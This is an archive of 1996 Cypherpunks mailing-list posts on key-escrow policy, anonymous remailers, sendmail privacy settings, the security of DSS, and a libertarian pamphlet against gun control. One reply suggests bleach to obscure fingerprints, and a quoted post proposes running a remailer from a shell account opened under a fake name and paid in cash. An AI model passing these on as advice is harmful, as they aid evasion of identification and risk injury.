perceived out in the net at large.

Take news.groups, a fairly important group I happen to read regularly. With
the exception of Rich Graves' presence, _all_ the uses I see there are for
cowardly abuse in a way that lets the poster escape having to answer for his
views. I'm not talking about presenting important information where
wrong-headed authorities could engage in reprisals, either, but baseless
accusations of theft, child abuse, and just plain torrents of obscenity.

That's _all_ it's used for (again, with the exception of Rich).

There's a problem here. It's one thing to say that the benefits of anonymity
outweigh the problems. I'm inclined to that view myself. But it's much
harder to defend that view in a forum where anonymity is used so commonly
for problematic ends, and to offer anything in the way of constructive
solutions. It would be pleasing to see more cypherpunks actively dealing
with these problems out there in net.land.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 May 1996 18:18:27 +0800
To: cypherpunks@toad.com
Subject: Re: Interactive Week exclusive - White House to launch "Clipper III"
Message-ID: <adc3f6c107021004c0c4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Bottom Line:

In a way, I am hoping that "Clipper III" is proposed, as it will energize
us once again. Historically, the "Cypherpunks antibodies" have had their
most vigorous growth when faced with a government antigen.


At 8:09 PM GMT 5/18/96, Will Rodger wrote:
>The White House is about to answer recent attempts to liberalize encryption
>exports with a proposal of its own.
>
>Documents obtained by Interactive Week show the Ciinton Administration has
>been lobbying key Republican committee members to compromise on encryption
>through a policy that looks very much like previous commerical key escrow
>efforts.
...
>The URL for the complete article is:
>http://www.zdnet.com/intweek/daily/960518y.html
>
>Will Rodger
>Washington Bureau Chief
>Interactive Week

Many thanks to Will for passing this on the Cypherpunks list. Our
opposition to Clipper I and Clipper II was strong and, I expect, will
continue with CIII.

A question for Will Rodger: Is this "White Paper" ("The newest proposal is
contained in a 24-page White Paper, a draft of which hit Capitol Hill
earlier this week") related in any way to the one being prepared by Herb
Lin and a bunch of other folks? It was due out about this time, and the
topic seems similar.  A bunch of us gave input to Herb and his panel at the
CFP in '95...if this is the same White Paper, looks like we might just as
well have saved our breath.

I read the stuff at the URL, and at first blush it looks to say nothing
about _domestic_ (within the U.S. and Canada) encryption. I'll be anxious
to see what the White Paper says about domestic encryption.

(To be clear, there are currently _no_ laws whatsoever about the types of
crypto a citizen (or resident alien, or, for all intents and purposes,
anyone)  may use, nor about the key length, nor about any form of GAK, etc.
Even Clipper I did not actually mandate allowable forms of crypto, though
many of us thought that this was the desired end-state, down the road. So,
I am tentatively assuming that Clipper III, if passed, will not diretly
impinge on domestic encryption policy, about which the government currently
says nothing.)

However, as with other proposed crypto laws and "trial balloons," there are
several questions which arise:

1. Will there be pressures put on the browser companies (Netscape,
Microsoft, etc.) and the e-mail companies (Qualcomm, Microsoft, Claris,
Lotus, etc.) to produce a "world version" that meets export standards with
a single shrink-wrapped package?

(Recall that last fall some of the various companies stated as their goal
having a single package that could be shipped worldwide. Some of them
claimed having two versions, a domestic U.S. version and an international
version, was too onerous. I am skeptical of this, given that they have
multiple platforms to support, multiple operating systems, etc. But they
claim it is.)

2. Interoperability. How will U.S. users exchange messages with
international users? Will a U.S. user have to register with the Authorities
to get the proper credentials, protocols, etc.? Will the U.S.-sold versions
of Netscape or Explorer, for example, contain the international GAKed
versions for use with international users?

3. With products like PGP, there are already international users (lots of
them). Thus, no "export laws" are involved. So, will I be able to
communicate with them using my existing PGP methods?

(If not, then my right to use an encryption product is in fact being
limited, contrary to the putative wording of what Clipper III is supposed
to be. To make this clear, I'm _already_ communicating with PGP, so no
"export version" is needed.)

And if U.S. users can continue to interoperate with international users as
they are now doing, this puts the lie to claims about how key escrow will
be useful for law enforcement.

4. And of course there is always the issue of _superencryption_. How a
GAKked program can detect that superencryption is being used has never been
adequately explained (to my satisfaction at least). Entropy measures won't
do it, and forbidding any encryption of messages already containing "BEGIN
PGP" will clearly just be a klugey bandaid.

5. What about U.S.-based corporations with offshore offices? Is a company
supposed to replace its entire intranet corporate network with a GAKked
system if even a single user is outside the U.S.-Canada?

(I fear that this is indeed the proposal. The effect will then be to make
all corporations GAKked.)

6. What about U.S. persons travelling abroad?

7. What about packets zinging around the world? Lots of complications if
GAK is insisted upon. And lots of new avenues for "packet laundering."

8. The issue of why other countries would insist that their citizens GAK
their keys when U.S. citizens don't have to!!

("Yes, Herr Glomlutz, we are insisting that all Germans using Netscape 4.0
must deposit their keys mit der Key Authority. No, we are not requiring our
own citizens to do this." I don't think this will fly too well.)

I can't see how other countries will go along with this.

And what about the usual problem of "rogue nations" like Iraq, Iran, North
Korea, Israel, and Liberia?

9. Many other issues. (They never answered the similar questions raised the
last time, so I doubt they will this time.)


Clipper III, if it turns out to be another worthless proposal which is
laughed out of Washington, will be no real threat. If Clipper III actually
outlaws or places limits on domestic use of crypto (as I think it must,
else it can be too easily circumvented completely), then it will be a
rallying cry which will likely see our membership increase still further,
the anti-Washington rhetoric escalate, and likely some new developments in
the war.


In a way, I am hoping that "Clipper III" is proposed, as it will energize
us once again. Historically, the "Cypherpunks antibodies" have had their
most vigorous growth when faced with a government antigen.


--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Escalier <escali_m@worldnet.fr>
Date: Sun, 19 May 1996 11:45:30 +0800
To: cypherpunks@toad.com
Subject: PLEASE HELP ME GO OUT OF THIS LIST!!!!!!
Message-ID: <199605182114.XAA07062@storm.certix.fr>
MIME-Version: 1.0
Content-Type: text/plain


how to go out of this list.
please help me, it would be VERY NICE.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpps@voicenet.com
Date: Sun, 19 May 1996 17:21:40 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
Message-ID: <199605190320.XAA01262@laura.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Senator Exon wrote:

> ... i just need a working method.

Clorox can take them off. Applied sparingly it could be used to obsure
portions of the whorls.

jps
-- 
Jack P. Starrantino   jpps@voicenet.com   http://www.voicenet.com/~jpps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 May 1996 19:14:43 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <adc4084d08021004e044@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


 More on what is adding to the current crisis:

* Fact: For _most_ people, there is no compelling (or even casual) need for
remailers.

(No, I'm not arguing against remailers. Just pointing out a basic economic
fact, to be factored in.)

* Fact: The value of having remailers goes up when certain kinds of
activities (which do not yet exist in any significant form) become more
available.

* Fact: The danger to remailer operators goes up when these kinds of
activities become more widespread.

(Another way of putting these last two points is this: The more valuable a
remailing function is, the more danger or liability a remailer faces.)

* Fact: Most remailers are being operated in the United States, and by
persons with only casual commitment to their continued operation. ("Casual"
should not be construed in a derogatory way.)

* Fact: There have been no definitive court rulings in the U.S. clarifying
the role of remailers. (In fact, no court cases involving remailers at all,
yet.) Until this is decided, remailer sites which appear to be the
emanation point (the last link) for the posting of, say, copyrighted
material, will find themselves ordered to cease and desist.

(The Church of Scientology involvement is beside the point. Brad Templeton
of Clarinet would likely do much the same thing if Clarinet-carried
articles were being posted to Usenet through remailers. So would "Time,"
and so, probably, would "Wired." We always knew that _something_ like this
would put remailers to a severe test.)

Conclusions:

- Remailers will continue to disappear as pressures are applied. Absent a
basic court ruling that remailer operators are not responsible or liable
for what is sent through their sites, they will fall under attack. Once one
falls, and a new site is used, it will become the target.

- Very few ordinary people use remailers. This will change as remailers
continue to get easier to use, but clearly most people feel little
need/threat.

- Ironically, if some sort of more restrictive regime comes to the fore,
and more people feel the need to use remailers (e.g., CDA is upheld and
abortion information becomes illegal to send over the Net), then this will
make the operators of remailers feel even more heat.

Is there an "equilibrium" point in all this, a "market clearing" point at
which remailers are badly enough needed, despite threats and pressures, so
as to provide a market for them?

An interesting question.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hieronym@desk.nl (t byfield)
Date: Sun, 19 May 1996 11:35:24 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Senator, your public key please?
In-Reply-To: <v03006600adc32fbc08ec@[193.0.0.2]>
Message-ID: <v03006601adc338d62c5d@[193.0.0.2]>
MIME-Version: 1.0
Content-Type: text/plain


10:16 AM  +0200 5/18/96, Black Unicorn:

 <...>
> Well, this depends on what we assume a signature does.
 <...>
> This depends on the intrepretation of the meaning of signature.
>
> > 	After all, Uni, what _does_ a signature signify? You were asking some
> > very pointed questions about that quite recently.
>
> Precisely, and in the absence of an answer to this question which is more
> substantial I think assuming that Senators and CEO's intended to vouch for
> your financial or character reputation is stretching it a bit.  But hey,
> I'm not on the Ethics Committee.

	Surely you don't conclude from the fact that _you_ think I'm
stretching it that most others would think so as well... My point wasn't
that the committee was "right" in any elegant sense but, rather, that their
misperceptions are almost certainly indicative of the kinds of
misperceptions that will propagate far and wide--and be effective--as
public-key encryption becomes more common. Humanity managed to get by for
centuries laboring under the delusion that cheese produces worms: the fact
that they were wrong doesn't make those centuries of fact go away.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Sun, 19 May 1996 13:02:07 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Why the Poor are Mostly Deserving of their Fate
In-Reply-To: <Pine.SUN.3.91.960518041937.11104A-100000@panix.com>
Message-ID: <Pine.SUN.3.93.960518233115.11520B-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 May 1996, Duncan Frissell wrote:

> It was understandable to be poor when all the world was poor.  It is 
> understandable to be poor in those nations today that make the 
> accumulation of wealth a crime for most people.  It is not understandable 
> to be poor (for long) in the US where one can reliably get out of poverty 
> simply by doing three simple things:
> 
> 1) get a high school diploma
> 2) get married
> 3) get any job
> 
> Only about 2 tenths of 1% of those who satisfy those three requirements
> incomes below the official poverty line.
> 
> Like most libertarians, I dislike the government.  I don't care what a 
> person's income is.  When I was self-supporting on an income of $200 a 
> month in 1979, I was below the poverty level for a single person myself.  
> I am not enamored of the rich or poor members of the dependendant classes 
> of course.
> 
> I try and keep in mind that 80-90% of the "take" in government 
> programs for the "poor" goes to unpoor government employees.
> 
> DCF
> 
I've done all these things - and rather more in the way of education.  But
while I don't fall on or near the poverty line, I'm still poor as a church
mouse.  What am I doing wrong?

Sean Gabb.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Sun, 19 May 1996 13:34:48 +0800
To: repubs <fox@libra.law.utk.edu
Subject: Gabb on Gun Control (again)
Message-ID: <Pine.SUN.3.93.960518234723.11520I-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


23:29 18/05/1996 

This is the second version of a piece that has already been
published on the Internet.  I offer it again because of the
Supplement that I have just added at the end.

Sean Gabb
cea01sig@gold.ac.uk
0181 858 0841

===============================================================
	GOLDSMITHS' COLLEGE DOES NOT NECESSARILY AGREE 
		WITH A WORD OF THE FOLLOWING
===============================================================

         Putting the Case Against Gun Control:
       Reflections on an Outrageously Effective 
         Television Performance - May 2nd 1996

                     by Sean Gabb

         (Published as Tactical Notes No. 17 
             by the Libertarian Alliance, 
         London, May 1996, ISBN 1 85637 343 6)
                      2nd edition


Last 2nd May, a Thursday, I was invited to Scotland to sit on the panel in
Words with Wark, a television discussion show which replaces Question
Time there once every month.  The researchers, it seems, had been unable
to find anyone in the country to denounce gun control, and so had to make
do with an English accent.  Having found me, though, they did their best
to keep me happy.  I was offered a taxi from South East London to
Heathrow, which I only turned down because public transport is faster
during the day.  I was given a business class seat on a flight to Glasgow -
cost L120 - and a first class railway sleeper back down to Euston - cost
L85.  Then there was a stretched Rover to Ayr Town Hall, where the
programme was to be recorded.  Adding my fee - which I could probably
have doubled had I been inclined - I may have cost them more than the
average MP.  Nice work when you can get it.

On the panel with me was the Editor of The Sunday Mail, and a journalist
whose name I never caught but who looked just like someone I knew and
loathed at university, and Guy Savage, representing the Shooters' Rights
Association.  These first two were there to argue for a ban on the private
ownership of guns, the third to claim that the Firearms Acts 1920 to 1988
strike a fair balance between competing interests, and that this should not
be upset just because a pair of lunatics in Dunblane and Tasmania had
decided to shoot lots of people.  In the studio audience were four politicians
- Sir Michael Hirst, Chairman of the Scottish Conservative Party, Margaret
Ewing, from the Scottish Nationalists, and two others whose names I again
missed but which are not worth looking up.  I have no idea how many
people watch Words with Wark.  But I imagine the BBC had given me a
seven figure audience to regale with my opinions.

And my opinion is that gun control is wrong in any form.  I believe that an
adult should be able to walk into a gun shop and, without showing any
permit or identification, be able to buy as many guns and as much
ammunition as he can afford; and that he should be able to carry this
round with him in public and use it to defend his life and property.  This
is not a popular view, I grant.  On the other hand, I doubt if many armed
criminals would take more notice of a gun ban than they do of the present
controls.  And it is worth asking how many people Michael Ryan could
have killed had anyone else in Hungerford High Street been carrying a gun. 
As the Americans say, "God made men equal, and Smith & Wesson make
damn sure it stays that way".

I earned my fee by saying all this in the studio.  I am sure I pleased the
researchers.  They spend much of their lives talking to people who say the
most outrageous things on the telephone, but who then lose heart in the
studio and agree with everyone else.  The audience was another matter. 
Speaking on the Kilroy programme here in London, I could probably have
made people bounce up and down on their seats with rage.  Just as likely,
there would have been a few Dunblane parents to sob pathetically into the
cameras.  Speaking in Ayr, the response I got was a shocked silence.  I
looked out into a sea of faces that reminded me of nothing so much as the
Jewish audience in Mel Brooks' The Producers, during the opening number
from Springtime for Hitler.  At last, someone who claimed to be a minister
of religion and a father of two denounced me for pulling God into politics -
 as if that were not what He is there for.  Someone else who said he fought
in Korea claimed I was so plainly unbalanced that I should never be let
near a gun.

As soon as what passed for debate had started again, I took care to score
a big "own" goal.  An Olympic shooter spoke, followed by a clay pigeon
shooter.  They were not against a gun ban - so long as their guns were left
out of it.  No said I, this would never do.  The purpose of guns was to kill
people.  The only matter of importance was to make sure they were used
to kill the right people, namely burglars and street criminals.  From the
look on the Olympic man's face, he was thinking of quite another category
of people to kill.

Twenty minutes pass very quickly in a television studio.  I had barely
warmed up before my panel was ejected, to make way for the politicians
to come on and bore everyone stiff with rail privatisation and nursery
vouchers.

Afterwards in the reception, I found myself shunned like the lepers of old. 
The locals turned their backs on me.  Sir Michael Hirst looked straight
through me as I sidled up to him with my glass of orange juice - so much
for the party of individual freedom!  Guy Savage muttered that my
comments had been "unconstructive".  On the ride back to Glasgow, he
pointedly ignored me, talking to the driver instead about negative equity. 
This was a shame.  On the ride over, he had been very friendly, sharing
with me his vast knowledge of the present law on guns, and even agreeing
to address a Libertarian Alliance conference on the right to keep and bear
arms.  Realising that my presence was not desired, I pretended to sleep all
the way back.

On the whole, I did pretty well.  One of the great falsehoods of modern life
is that arguments are won by being "moderate" - by conceding the other
side's point and then haggling over the details.  They are not.  The gun
lobby, for example, spent nearly half a million after Hungerford trying to
stop the Firearms Bill that resulted from it.  I imagine most of the cash
went straight to a gang of sleazy PR hacks, who organised a few lunches
with politicians too corrupt even to stay bought.  What little found its way
into the media was one long grovel, by clay pigeon and Olympic shooters
begging for laws that would hurt only other gun owners.  They rolled over
and showed their bellies to Douglas Hurd.  Not surprisingly, he gave them
all a good, hard kicking.

Arguments are won by being honest - by saying what you believe as clearly
as possible, as often as possible, and never mind how "unconstructive" it
seems in the short term.  Doing so has three effects.  First, it shifts the
middle ground in a debate.  This is valuable in a country where being
moderate is so in fashion.  For this middle ground is not an independent
point of view, but can be pulled sharply to and fro by what is happening
at the extremes.  Before about 1975, for example, the public spectrum on
economic policy stretched between Soviet communism and social
democracy.  Accordingly, the moderates were all pink socialists.  Now there
are libertarians demanding a total free market, the moderates have become
blue social democrats.  And, though important, the collapse of the Soviet
Union was not entirely to blame for this - in those countries without a
libertarian fringe, after all, the consensus is still decidedly pink.  In my
own case, had I not been in that studio, the spectrum would have stretched
between a total ban and the status quo; and anyone trying to sound
moderate would have had to favour many more controls.  As it was, Mr
Savage came across as the centrist - a fact recognised by the people who did
not shun him as they did me, and a fact worth noting by the Shooters'
Rights Association if it ever wants to live up to its name.

Second, it gets converts.  Granted, my audience in the studio was full of
glum blockheads.  But there must have been dozens of people at home who
were hearing what I said for the first time and who agreed with every word
of it.  Most of these will stay at home.  Others - one or two, perhaps - will
become committed libertarian activists.  They will join the Libertarian
Alliance.  They will hand out its publications.  They will write for it.  They
will appear in television studios, putting the libertarian case on whatever
they have been called in to discuss.  Moreover, even the blockheads have
a function.  If they can remember what I said in the studio - not hard,
bearing in mind how clear I was - they will spread it by explaining to
friends and relations how scandalised they were by it.  Sooner or later, the
message will reach someone who is not at all scandalised; and another
convert will have been made.  And that is how intellectual revolutions get
under way.  With his claim that Hungerford and Dunblane were "failures
of policing", and the like, I doubt if Mr Savage enthused anyone to go out
and do something against the gun grabbers.

Third, it establishes a position.  Unusual ideas are generally ignored at
first.  Then, if they continue being put, they are laughed at.  Then they
must be argued with.  Occasionally, they become the common sense of the
next generation.  That is how it was with socialism in this country.  More
recently, it was like that with monetarism and council house sales.  I do not
know if my dream of abolishing gun control will be so lucky.  But, to be
sure, no one will take notice of it unless someone goes to the trouble of
clearly arguing for it.

Yes, I did pretty well in Scotland.  I may do even better the next time I am
allowed into a television or wireless studio.


Supplement - Saturday May 18th

I was allowed back yesterday morning.  I cast the first version of the above
onto the Internet on May 10th.  The following morning, Jim Hawkins of
BBC Radio Northampton replied by e-mail.  He had read my pamphlet and
liked it, and he wanted me to repeat it on his programme on Friday the
17th.

So there I sat for an hour yesterday morning, telling another million people
why the gun control laws should be abolished.  I was against Anne Pearson
(at least, that is how her name sounded) of the Snowdrop Campaign - this
being a group set up after Dunblane to press for a total ban on handguns. 
Though honest, she was not very bright, and I went through her like a hot
knife through butter.  When I accused her of wanting to live in a slave
state, she answered "Yes, I do".  When I further accused her of trusting no
one else with guns because she felt unable to trust herself with one, she
started to panic.  When I repeated my wish that someone else in
Hungerford had been armed, she referred to my appearance on Words
with Wark, saying only that I had worried her then, and I worried her
now.

I said much else, ranging from the Jews in Nazi Germany ("what if they
had been able to shoot back?"), to Waco ("men, women and children
murdered by the American Government").  In short, I indeed did even
better this time than last - and if anyone doubts this, I have a tape to
proves it.

Enough of boasting, however.  The reason for this Supplement is to
emphasise that extremism does work.  Consider:

First, it was extremism that got me on Words with Wark, and an extremist
report of what I did there that got me on the Jim Hawkins show.  It annoys
me that I can never make the national press - versions of my pamphlet, for
example, came straight back to me from The Spectator and The Sunday
Telegraph, as if wafted on cries of horror.  Nevertheless, the electronic
media can hardly get enough of me and Brian Micklethwait and the rest of
us.  Whether or not we can ever win it, we lack no opportunity for putting
the libertarian case.

Second, it is extremism that makes us so effective in debate.  The gun
grabbers and other enemies of freedom have so far had an easy ride in the
media.  They have only had to argue with cowards and fools who, worried
not to upset anyone, have failed to make most of the good points.  They
have never known principled, uncompromising opposition.  Faced with it,
they behave like rabbits faced with a new strain of myxomatosis:  they have
no defences.  If Mrs Pearson was out of her depth with me, so at present
are all of her colleagues.  They have ready answers to the whinings of the
clay pigeon lobby, but none to anyone who asserts a right of self defence
against "burglars, armed robbers and other trash".

Third, extremism really does shift the middle ground.  In the main
pamphlet above, I was unable to give examples from my own experience. 
Since yesterday morning, I can.  Someone from a shooting club called in,
and said "I want to take a middle view between the speakers".  He then
argued against any change in the gun laws.  Without me there, he could
never have got away with that.  He would have been denounced as a
potential Thomas Hamilton, trying to save his penis extension.  Half an
hour of me, and Mrs Pearson nearly embraced him.  Guy Savage and the
Shooters' Rights Association - again, please take note.

In a few minutes, I will send this revised pamphlet to Brian, for publishing
by the Libertarian Alliance.  Before he even sees it, though, it will be all
over the Internet - there to be read by anyone else who happens to have a
studio to fill.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Dierks <tim@dierks.org>
Date: Sun, 19 May 1996 18:57:43 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <v02140b00adc474aeab54@[206.170.39.104]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:41 PM 5/18/96, Bill Stewart wrote:
>>I was talking to someone who was talking to someone (have I said this is a
>>rumor yet?) who was solicited for comment by a Very Famous Reporter about
>>the fact that  DSS, the Digital Signature Standard, promulgated by NIST, I
>>believe, had been broken.
>
>MD5 is at least weakened, maybe broken; there's an abstract by Hans Dobbertin
>that says something about generating collisions, and gives an example

DSS uses SHA, which isn't affected by the Dobbertin finding. I believe that
you would have to solve the discrete logarithm problem to break DSS; this
would imply being able to break Diffie-Hellman and a number of other crypto
algorithms. (However, I'm not certain that it's been shown that breaking
DSS is equivalent to breaking discrete logarithms.)

 - Tim

Tim Dierks - Software Haruspex - tim@dierks.org

"That's the trouble with technology. It attracts people who have nothing
to say." - Muffey Kibbey, mother [Wall Street Journal, May 10 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 May 1996 19:08:15 +0800
To: cypherpunks@toad.com
Subject: Instant Remailers
Message-ID: <adc410f709021004e950@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 AM 5/19/96, Mark M. wrote:

>It is possible for someone to operate an anonymous remailer anonymously.
>Just get a UNIX shell account under a fake name, pay with cash, and set up
>the remailing software.  The identity of the operator of such a remailer
>would be difficult, if not impossible, to discover.

I'm always surprised that this hasn't been happening; maybe it will when
the new clients become available.

(Doesn't Sameer's system offer such accounts? Couldn't there be dozens of
remailers based at c2.org? Of the 16 Type-1 remailers listed in one of
Raph's recent reports, only 2 were at c2.org.)

Now, can a site which "offers" such accounts be held liable? If the site
drops an account when presented with _appropriate_ legal papers (a court
order, such as an injunction), and if it takes a "hands-off" policy with
respect to what customers run in their accounts, then it ought to be safe
from actual liability.

(I am not a lawyer, but it seems that having no prior knowledge of acts
committed, and complying with court orders, reduces the likelihood of
successful suits to near zero. Note that Netcom did _not_ cancel the
COS-related accounts, and so extended its legal hassles.)

The advantage of "pliable" remailers (which go away when hit) is that:

Cost of preparing case to stop a remailer >> cost of setting up a new remailer

Thus, it might cost the Church of Scientology $10,000 in various fees to
get "account42666@c2.org" to stop remailing, but only $20 (or even less) to
create "account98410@c2.org."

Ideally, such remailers should require no involvement at all by the account
holder. Just a "start" command, by the account holder. (Not the site
administrator, as this could be construed as involvement by him.)

But an "instant remailer" (just add water) is needed. Recent questions here
on the list about what it takes to run a remailer may mean some advice is
needed.

Running a remailer function should never be thought of as being the same as
running a site. Most of the existing remailers are certainly not being run
on machines _owned_ by those running the remailers.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Sun, 19 May 1996 18:55:42 +0800
To: cypherpunks@toad.com
Subject: Re: Sendmail Question (was: SMTP Server for sending to anonymous remailers?)
Message-ID: <adc4757d08021004421c@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 PM 5/18/96, Anonymous User wrote:
>lcs Mixmaster Remailer <mix@anon.lcs.mit.edu> wrote:
>
>> > Does anyone know of an anonymous remailer that has an SMTP server
>> > (hopefully unlogged) that I can specify in a special variant of the
>> > "sendmail.cf" sendmail configuration file for sending mail to
>> > anonymous servers?
<SNIP>
>
>What settings do you use in sendmail.cf to accomplish this (sending
>it directly)?  Is that the default behavior?  Specifically, what
>goes on the "DR" and "DV" lines?  When I send mail from my PPP
>account to my work account, I always seem to end up with a "Received:
>>From <my ISP's host> by <some intermediate host>" line.  I'm
>ass-u-ming that if the host name shows up in the headers, it's
>passing through that machine and is potentially being logged.

Basically, the only reason your ISP's machines would appear in your
sendmail.cf is because you are using them for mail forwarding. When I was
connected over PPP (24 hours) I had my Linux box send the mail directly. If
you just want to avoid your ISP's logs, then replace their mail server with
some other server in your sendmail.cf. You should ask the owner of the
server you want to use.

If you use popmail (like Eudora), then just tell it the server to use in
"SMTP Host".

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 19 May 1996 18:59:36 +0800
To: "cypherpunks@toad.com>
Subject: RE: The Crisis with Remailers
Message-ID: <01BB451A.0F4D21C0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Bruce Baugh

>hence my comments from here from time to time that the technological
>problems of anonymity are not the true obstacle to widespread use. 
>there are deeper problems that cpunks skirt around but fail to grasp
>because of numerous prejudices. 

While I hate to lend support to anyone as much a twit as Vulis is, he's got
a point here. I don't think most cypherpunks realize how anonymity is
perceived out in the net at large.
......................................................................


Bruce:   Vulis is not the twit who wrote that paragraph.  Vulis is not Vlad.  

Vulis:   "Vlad" is not Vlad.


You all need to go out to LD's web site and refresh your memory.

     ..
Blanc











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 19 May 1996 17:19:04 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: The Crisis with Remailers
Message-ID: <199605190450.AAA12788@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 May 96 at 13:06, Vladimir Z. Nuri wrote:

> >> 2. there is no good way to deal with spams or other so-called "abuse"
> >
> > Nor should there be.  What's one person's abuse is another person's
> >free speech.  Internet traffic should not be censored based on contents.
> 
> pardon me, but a rather shallow response. 
[stuff i kind of agree with deleted]

I have my own mini-solutions... for personal mail, I use a kill file. 
For Usenet (when I'm really stuck with too much free time and 
actually read it) FreeAgent and Agent have some ignore 
thread/kill-file abilities (my setup only retrieves headers... so I 
have that luxury for now).

How to deal with the problem as an admin is an entirely different 
story. Solutions?

 
---
No-frills sig.
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Schofield <john@ktb.net>
Date: Sun, 19 May 1996 19:18:32 +0800
To: cypherpunks@toad.com
Subject: Cheap remailers
Message-ID: <2.2.32.19960519073129.006cb6a8@mail.ktb.net>
MIME-Version: 1.0
Content-Type: text/plain


There's been much talk on this list about the need for cheap remailers, and
I wanted to announce (unofficially) one of the least expensive remailer
setups I've seen.  The code is written by Jim Cannell, with documentation by
me.  It's designed as a remailer for Fidonet-technology systems.  Fidonet
Anonymous ReMailer runs under standard DOS, and is quite easy to install and
run.  The average Fidonet sysop should be able to get it up and running in
about 15 minutes.

With Internet gateway software and a UUCP account, it works quite well as an
Internet remailer.  I'm running a beta-test version at
remail@sprawl.ktb.net.  Please feel free to use it.  Help files are
available, but are oriented towards Fidonet users.  Still, you should be
able to puzzle it out.  It will only be up for a month longer, because I'm
leaving the country for two months, but Jim should keep you posted after the
public release on what Fidonet remailers are operating.

Requirements for running a Fidonet Anonymous ReMailer:

286-clone or better, with a 2400bps modem or better.
Fidonet Anonymous Remailer (free)
telephone line (a dedicated line is good, but not necessary)
Fidonet mail tosser (free or inexpensive shareware)
Fidonet Mailer (free or inexpensive shareware)

Most people probably won't be running Fidonet Anonymous Remailer with quite
this inexpensive a setup.  I'm running on a 486-50, two dedicated phone
lines, and two 28.8k bps modems.  If all I was running was the remailer, I
certainly wouldn't need that much hardware.

The remailer will be released with full source When It's Ready, and any
Fidonet node (there are more than 20,000) will be able to run the software
and act as a remailer.  The UUCP feed is not necessary for Internet
connectivity -- any Fidonet node can send and receive e-mail from the
Internet through standard gateways.  However, operating your own gateway
makes it much more fast and reliable.  I pay $20/month for my UUCP feed.

Fidonet can't compete with the Internet in terms of features, activity, or
much else -- but for dirt-cheap bare-bones networking, you can't beat it.


John
______________________________________________________________________________

                    ac086@lafn.org
                        john@ktb.net
                             library@c2.org
                                  (They're all me.)

        PGP Public Key available by e-mailing PGPKEY@sprawl.ktb.net
                        or by fingering library@c2.org.

        Check out the Digital Library at http://www.c2.org/~library/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
